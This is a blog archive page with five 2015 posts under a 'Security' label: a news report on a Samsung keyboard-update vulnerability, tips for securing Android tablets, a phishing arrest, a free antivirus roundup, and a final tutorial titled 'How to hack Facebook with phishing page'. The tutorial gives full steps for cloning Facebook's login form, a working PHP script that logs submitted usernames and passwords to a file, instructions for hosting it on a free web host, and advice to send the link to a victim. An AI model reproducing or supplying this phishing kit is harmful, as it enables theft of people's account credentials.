Showing posts with label Security. Show all posts
Showing posts with label Security. Show all posts

Wednesday, 17 June 2015

New exploit turns Samsung Galaxy phones into remote bugging devices

As many as 600 million Samsung phones may be vulnerable to attacks that allow hackers to surreptitiously monitor the camera and microphone, read incoming and outgoing text messages, and install malicious apps, a security researcher said.
The vulnerability is in the update mechanism for a Samsung-customized version of  SwiftKey, available on the Samsung Galaxy S6, S5, and several other Galaxy models. When downloading updates, the Samsung devices don't encrypt the executable file, making it possible for attackers in a position to modify upstream traffic—such as those on the same Wi-Fi network—to replace the legitimate file with a malicious payload. The exploit was demonstrated Tuesday at the Blackhat security conference in London by Ryan Welton, a researcher with security firm NowSecure. A video of his exploit is here.
hones that come pre-installed with the Samsung IME keyboard, as the Samsung markets its customized version of SwiftKey, periodically query an authorized server to see if updates are available for the keyboard app or any language packs that accompany it. Attackers in a man-in-the-middle position can impersonate the server and send a response that includes a malicious payload that's injected into a language pack update. Because Samsung phones grant extraordinarily elevated privileges to the updates, the malicious payload is able to bypass protections built into Google's Android operating system that normally limit the access third-party apps have over the device.
Surprisingly, the Zip archive file sent during the keyboard update isn't protected by transport layer security encryption and is therefore susceptible to man-in-the-middle tampering. The people designing the system do require the contents of that file to match a manifest file that gets sent to the phone earlier, but that requirement provided no meaningful security. To work around that measure Welton sent the vulnerable phone a spoofed manifest file that included the SHA1 hash of the malicious payload.
Welton said the vulnerability exists regardless of what keyboard a susceptible phone is configured to use. Even when the Samsung IME keyboard isn't in use, the exploit is still possible. The attack is also possible whether or not a legitimate keyboard update is available. While SwiftKey is available as a third-party app for all Android phones, there's no immediate indication they are vulnerable, since those updates are handled through the normal Google Play update mechanism.
For the time being, there's little people with vulnerable phones can do to prevent attacks other than to avoid unsecured Wi-Fi networks. Even then, those users would be susceptible to attacks that use DNS hijacking, packet injection, or similar techniques to impersonate the update server. There is also no way to uninstall the underlying app, even when Galaxy owners use a different keyboard. In practical terms, the exploit requires patience on the part of attackers, since they must wait for the update mechanism to trigger, either when the phone starts, or during periodic intervals.
Welton said he has confirmed the vulnerability is active on the Samsung Galaxy S6 on Verizon and Sprint networks, the Galaxy S5 on T-Mobile, and the Galaxy S4 Mini on AT&T. Welton has reported to bug to Samsung, Google, and the US CERT, which designated the vulnerability CVE-2015-2865. The bug has its origins in the software developer kit provided by SwiftKey, but it also involves the way Samsung implemented it in its Galaxy series of phones.


Update: In an e-mailed statement, SwiftKey officials wrote: "We’ve seen reports of a security issue related to the Samsung stock keyboard that uses the SwiftKey SDK. We can confirm that the SwiftKey Keyboard app available via Google Play or the Apple App Store is not affected by this vulnerability. We take reports of this manner very seriously and are currently investigating further."
The researcher said Samsung has provided a patch to mobile network operators, but he has been unable to learn if any of the major carriers have applied them. As Ars has reported in the past, carriers have consistently failed to offer security updates in a timely manner.



Saturday, 2 May 2015

Top 4 Ways to Secure Android Tablet from Hacking


People nowadays make use of their smartphones and tablets as a daily lifestyle, not to show off or something, but these gadgets have become necessities of life. Tablets and smartphones, for instance, are used for texts, emails, and contact details; call logs, social media apps, browsing history, personal photos, save pin numbers, credit card numbers, passwords, and more. Now, don’t be confident that this information in your tablet is secured always as someone might just pick it up, snoop, go over it, or worse, steal your device and everything in it.

Threat of Data-stealing

Aside from people stealing the main device, expert hackers might cook up some automated threats and data-stealing apps. Hackers are not the only threats around as cellular providers, advertisers, and even the government might track your movements physically and online. Certainly, there are several risks to your gadget and the sensitive information it contains, needing you to take quick steps to lock down your tablet, while keeping away from snoopers and hackers.
  • Maximize Free Security Apps
Malicious apps are all over, and there is something you can do to reduce or eliminate such risks. If hackers are unable to slip a data-stealing app onto your tablet, then they might do another trick of stealing information through a phishing email. Security apps will keep a close eye on such things such as Webroot, a free Android app that is able to scan other applications for malicious codes, warning you of any danger. Security apps would also protect you from phishing scams that are very tricky until you download something you should never have.
  • Rely and Install Trusted Apps
Obviously, bad apps are full of malware that tends to infect gadgets with viruses or steal information. Hence, you must only rely and install applications from major stores like Amazon Appstore, Google Play, Windows Store, and so on. Mostly, third-part stores host malicious apps, disguising as popular and real ones. This is not an issue between Microsoft and Apple users as they are locked into their exclusive app stores. Android gadgets, however, allow users to visit other stores, besides Google Play.
  • Set Your Password or PIN Code
Many smartphone and Android users only use the “Swipe to unlock” default in their screens, provoking more thieves and snoopers. Setting your own password of pin code is very easy and will reduce the risks of your gadget being hacked or stolen. Come up with a combination or passcode that you’ll never forget, and changing this once in a while is also a good idea!
  • Keep Safe from Public Connectivity
Public hotspots are very ideal in reducing your data plan consumption, surfing the web very conveniently. However, there is also a downfall to this as free public connectivity could pose dangers as well. Remember, hackers will always be hackers, and they will try to infiltrate these networks so as to steal valuable information. As much as possible, do your online shopping and banking transactions at home, never through public Wi-Fi networks.

Wednesday, 18 March 2015

Three cybercriminals arrested for Phishing




The police has arrested three persons which allegedly are responsible for sending fake banking emails to unaware internet users. The three persons were sending fake banking emails to phish information which they would use to generate an revenue.

An 68-year old male was targeted by the phishing e-mail, the 68-year-old male did provide his information, but after a little while he became aware of the phishing mail and he informed the police to investigate the case.

The criminals, which are 21,22 and 25-years-old had arranged an appointment with the 68-year-old male to pick-up the banking card. The police was informed about the appointment, and the police was able to arrest the three cybercriminals without any problems.
The three Dutch cybercriminals are still arrested.


If you liked this post, say thanks by sharing it:

Monday, 16 February 2015

Select The Best Free Antivirus for Windows 8 and 8.1

best free antivirus for windows 8 and Windows 8.1

According to reports, the windows defender of Windows 8 and 8.1 can resist a number of modern threats, such as zero day attacks, without using any third party security suite. However, the installation of best antivirus for windows can highly improve the performance of the system as well as guarantee maximum protection against nasty virus, spyware, malware, hackers, and phishing sites. Everyone wants their system to be safe, but majority are reluctant to use paid services or pay the renewal fees. Fortunately, you can find a number of best free antivirus for windows 8 and Windows 8.1, which revolutionizes internet security.
Since Microsoft has recommended to install third party antivirus software on your Windows 8 or 8.1 to fight against advanced virus attacks, its always better to select the best free antivirus. You can disable or remove Windows defender.
We have a list of three top-rated free antivirus programs with their unique features, which will make it easy for you to select the right choice for your windows.

Top Rated Free AntiVirus Software for Windows 8 and 8.1

1) Avast Free Antivirus:

Avast is one of the most preferred full featured internet security solutions. As per the records of the company, they are protecting more than 200 million PCs, Macs, and Androids. The newly streamlined user interface of Avast includes a number of options to detect and clean up the malware. In addition to the common security tools, such as Anti-malware Protection, Anti-spam, Software Updater, SafeZone, Avast includes a number of interesting features like
Browser Cleanup utility to clean up the browser from unwanted software
Intelligent Antivirus, which uses new DynaGen technology to protect the PC
Silent Firewall to protect the PC from hackers
Pros
Easy to install
Do Not Track technology
Verify unpatched applications
Cons
Difficulty in removing the right software from the list of blocked programs

2) Avira Free Antivirus:

Avira is the top rated and popular security solution to protect your PC from virus, adware, spyware, or any kind of malware. The decent scanning speed with excellent usability score, ability to deal with maximum threats are some of the highlighted features of Avira Antivirus. Moreover, the antivirus uses only limited resources, making it easy to load and use other applications without any lag. Before installing any new software, it makes sure that the software is compatible with your PC, and helps to avoid crash.
Pros:
Ease of use
Simple UI
Continuously monitors the PC
Automatically scans for compatibility of software
Quick scan
Least impact on performance of the system
Cons:
Frequent pop-ups from the Avira Notifier 

3) AVG AntiVirus Free 2014:

The AVG antivirus has incorporated a large array of useful features, which can make you safe while surfing on the internet. The smart and simple user interface makes things much easy for the users to carry out the operations with a few clicks. The advanced settings and good localization has took it far ahead from the rivals.
Pros
Best rating from almost all independent labs
Very effective in removing threats from malware-infested test systems
Do Not Track technology
PC tuneup analysis
Cons
Resource hog
 We highly recommend to install third party anti virus software on your computer. Windows defender can be a very basic anti virus protection only which can’t fight against all virus and threats attacks.

Saturday, 31 January 2015

How to hack Facebook with phishing page


Steps to create a phishing page:

1) Go to the Facebook page ,and then right click on the page, You will see the option “view page source”,click on it.
2) Now a new tab will open which contain a source code,
Select and COPY all the code and paste it in a notepad.
3) Now open the notepad and press CTRL+F,and type ACTION.
4) You will have to find a text which looks like :

action="https://www.facebook.com/login.php?login_attempt=1

5) Delete all the text written in red colour and instead of it write post.php.then it will look like :
action="post.php"

6) Now save it on your desktop with the name index.htm
7) Now your phishing page is ALMOST READY.
8) Open a new NOTEPAD and save the given data with the name post.php

<?php
header ('Location:http://www.facebook.com/');
$handle = fopen("usernames.txt", "a");
foreach($_POST as $variable => $value) {
   fwrite($handle, $variable);
   fwrite($handle, "=");
   fwrite($handle, $value);
   fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
exit;
?> 

9) You have two files now one is index.htm and another is post.php
Remember file extension(.php) is important.
10) Now u have to upload it in a web hosting site ,i prefer u to use www.000webhost.com or else www.,my3gb.com.
11) I prefer u to use 000webhost because it will be easy to use.
12) You have to make a account in that
13) Now go control panel ,then on file manager.
14) After that a new window will pop up,Now go to public_html.
15) Delete the file named default.php, After that upload two files that we created (index.htm and post.php)
Upload them one by  one .
16) Now the last step click on view of index.htm it will look same as facebook page.
17) Copy the URL of that page and send this link to your victim,when your victim try to login in to it with the username and password.
The page redirectly connect to facebook. and you will be now able to see his password.
18) Open your 000webhost account and go to file manager then public_html,here you find a new file named username.txt.
19) Click on view now u will have your friend's password and email id.


This is a simple trick to hack any Facebook password account by phishing page.

If you are not able to create a phishing page then I will provide you a video tutorial link
Comment below if you have any problem in any step


Phishing is a ILLEGAL activity!
You can make phishing page for Facebook and also you can make phishing page of any website by following SIMILAR steps